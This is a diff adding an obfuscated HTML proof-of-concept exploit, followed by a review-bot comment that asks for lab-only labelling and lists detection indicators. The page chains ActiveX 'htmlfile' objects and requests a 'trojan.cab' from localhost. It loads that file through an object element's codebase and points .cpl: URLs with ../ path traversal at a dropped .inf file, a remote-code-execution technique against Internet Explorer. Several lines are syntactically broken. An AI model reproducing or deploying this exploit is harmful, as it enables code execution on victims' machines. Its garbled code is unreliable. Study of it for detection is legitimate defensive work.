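--- a/poc.html
+++ b/poc.html
@@ -0,0 +1,68 @@
+<!DOCTYPE html>
+<html>
+ <head>
+ <meta http-equiv="Expires" content="-1">
+ <meta http-equiv="X-UA-Compatible" content="IE=11">
+ </head>
+ <body>
+ <script>
+function(){
+ try{
+ window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
+ window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
+ }catch(_0x1c747c){
+ window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
+ window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
+ }
+ iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
+ window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
+ try{
+ window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
+ window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
+ }catch(_0x5afb73){
+ window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
+ window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
+ }
+ iframeActxHtml1['open']()['close']();
+ var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');
+ iframeActxHtml2['open']()['close']();
+ iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');
+ iframeActxHtml3['open']()['close']();
+ var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');
+ iframeActxHtml4['open']()['close']();
+ var actx_html_0=new ActiveXObject('htmlfile'),
+ actx_html_1=new ActiveXObject('htmlfile'),
+ actx_html_2=new ActiveXObject('htmlfile'),
+ actx_html_3=new ActiveXObject('htmlfile'),
+ actx_html_4=new ActiveXObject('htmlfile'),
+ actx_html_5=new ActiveXObject('htmlfile'),
+ xmlhttpreq1=new window['XMLHttpRequest'](),
+ window['setTimeout']=window['setTimeout'];
+ window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/trojan.cab',![]),
+ window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
+ iframeActxHtml4['Script']['document']['write']('&amp;lt;body>');
+ var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
+ cabloadunpack['setAttribute']('codebase','http://localhost/trojan.cab#version=5,0,0,0');
+ cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
+ window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:123',
+ actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf',
+ actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf',
+ actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf',
+ actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf',
+ actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf',
+ actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf',
+ actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf',
+ actx_html_3['Script']['location']='.cpl:../../whoiam.inf';
+}();
+ </script>
+ </body>
+</html>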
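Review bot: poc.html is added with no header comment, so nothing in the file tells a reader what it demonstrates, which component it exercises, or that it is meant for an isolated lab host only. I would add a leading comment such as `<!-- Lab test page: requests http://localhost/trojan.cab, references it from an object element's codebase, then points htmlfile documents at .cpl: paths ending in whoiam.inf -->`, plus a short comment above the nine identical `'.cpl:123'` assignments saying why they are repeated. For detection work, the behaviours visible in this file are worth recording alongside it: an `object` element whose `codebase` is a remote `.cab` with an explicit `classid`, and `.cpl:` locations that use `../` traversal into `AppData/Local/Temp`. The bracket-notation property access (`window['Document']['prototype'][…]`) looks like obfuscator output and makes the page hard to review; plain dotted access would read better in a test artifact.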